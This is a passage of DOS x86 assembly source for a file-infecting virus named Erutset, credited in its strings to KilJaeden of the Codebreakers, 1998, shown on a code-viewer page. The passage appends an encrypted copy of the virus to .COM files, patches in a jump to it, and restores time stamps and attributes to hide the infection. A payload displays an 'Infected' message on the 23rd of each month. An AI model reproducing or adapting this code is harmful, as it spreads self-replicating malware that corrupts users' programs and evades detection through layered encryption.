📄 erutset.asm
字号:
int 21h ; first three recorded
mov ax,4202h ; scan to end of file
xor cx,cx ; xor value of cx to 0
cwd ; likewize for dx
int 21h ; DX:AX = file size now!
cmp dx,0 ; is the file < 65,535 bytes?
jne close ; way to big, close it up
mov cx,word ptr [bp+saved+1] ; move buffer+1 into cx
add cx,finished-start+3 ; virus size + jump
cmp ax,cx ; compare the two
jz close ; if equal, close it up
sub ax,3 ; get jump to virus body size
mov word ptr [bp+newjump+1],ax ; write as our new jump
mov ax,4200h ; point to start of file
xor cx,cx ; xor value of cx to 0
cwd ; likewize for dx
int 21h ; pointing to SOF
mov ah,40h ; write to file
mov cx,3 ; write three bytes
lea dx,[bp+newjump] ; write the jump
int 21h ; jump is written
mov ax,4202h ; point to end of file
xor cx,cx ; xor value of cx to 0
cwd ; likewize for dx
int 21h ; pointing to EOF
lea si,[bp+start] ; load the source index
lea di,[bp+buffer] ; load the destination index
mov cx,finished-start ; # of bytes to put in mem
rep movsb ; load virus into memory
lea di,[bp+t_encd-start+buffer] ; load the source index
mov si,di ; load the destination index
mov cx,t_encr-t_encd ; # of bytes to encrypt
call t_encr ; encrypt the 1st layer
lea si,[bp+d_encd-start+buffer] ; load the source index
mov di,si ; load the destination index
mov cx,d_encr-d_encd ; # of bytes to encrypt
call d_encr ; encrypt the 2nd layer
lea di,[bp+encd-start+buffer] ; load the destination index
mov si,di ; load the source index
mov cx,encr-encd ; # of bytes to encrypt
call encr ; encrypt the 3rd layer
mov ah,40h ; write to file
mov cx,finished-start ; # of bytes to write
lea dx,[bp+buffer] ; write from mem
int 21h ; write the bytes now
close: mov ax,5701h ; set time / date stamps
pop cx ; restore the time
pop dx ; restore the date
int 21h ; time / date is restored
mov ax,4301h ; set file attributes
pop dx ; for this file name
pop cx ; with these attributes
int 21h ; attributes are restored
mov ah,3eh ; close up the file
int 21h ; file is closed
abort: pop bp ; pop original delta offset
jmp exit ; point to original ISR
; ------------------------------------------------------------------------- ;
; ------------------------------------------------------------------------- ;
saved db 0cdh,20h,0 ; our saved bytes
newjump db 0e9h,0,0 ; the soon to be jump
pldmsg db '',10,13
db ' Infected with :: Erutset :: coded by KilJaeden of the Codebreakers 1998',10,13,'$'
; ------------------------------------------------------------------------- ;
; ------------------------------------------------------------------------- ;
pload: mov ah,2ah ; get system time
int 21h ; get it now
cmp dl,23 ; is it the 23rd?
jne endpld ; nope, end the payload
mov ah,09h ; print a string
lea dx,[bp+pldmsg] ; our message
int 21h ; print our message
mov ah,00h ; wait for keypress
int 16h ; make them see us
endpld: ret ; return from call
; --------------------( End Of 3rd Encryption Blanket )-------------------- ;
; ------------------------------------------------------------------------- ;
t_encr: lodsb ; load a byte
xor al,0C4h ;-----[1]
ror al,4 ;----[2]
not al ;---[3]
neg al ;--[4]
rol al,4 ;-[5]
neg al ;--[4]
not al ;---[3]
ror al,4 ;----[2]
xor al,0C4h ;-----[1]
stosb ; store a byte
loop t_encr ; do all the bytes
ret ; return from call
; --------------------( End Of 2nd Encryption Blanket )-------------------- ;
; ------------------------------------------------------------------------- ;
d_encr: lodsb ; load a byte
neg al ;---------[1]
ror al,4 ;--------[2]
not al ;-------[3]
neg al ;------[4]
rol al,4 ;-----[5]
not al ;----[6]
ror al,4 ;---[7]
neg al ;--[8]
xor al,069h ;-[9] encryption/decryption
neg al ;--[8]
ror al,4 ;---[7]
not al ;----[6]
rol al,4 ;-----[5]
neg al ;------[4]
not al ;-------[3]
ror al,4 ;--------[2]
neg al ;---------[1]
stosb ; store the byte
loop d_encr ; do all the bytes
ret ; return from call
; --------------------( End Of 1st Encryption Blanket )-------------------- ;
; ------------------------------------------------------------------------- ;
encr: lodsb ; load a byte
neg al ;---[1]
ror al,4 ;--[2]
xor al,0C4h ;-[3] encryption/decryption
ror al,4 ;--[2]
neg al ;---[1]
stosb ; store the byte
loop encr ; do all the bytes
ret ; return from call
; ------------------------------------------------------------------------- ;
; ------------------------------------------------------------------------- ;
buffer: ; save our virus in mem
finished: ; end of the virus
once: lea si,[bp+new] ; load the source index
lea di,[bp+decr] ; load the destination index
movsw ; move two bytes
movsb ; move one byte
jmp t_encd ; jump to encrypted area
new: mov cx,encr-encd ; this replaces the jump
code ends ; end code segment
end blank ; end / where to start
; ------------------------------------------------------------------------- ;
; ---------> How Can You Think Freely In The Shadow Of A Church? <--------- ;
; ------------------------------------------------------------------------- ;
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -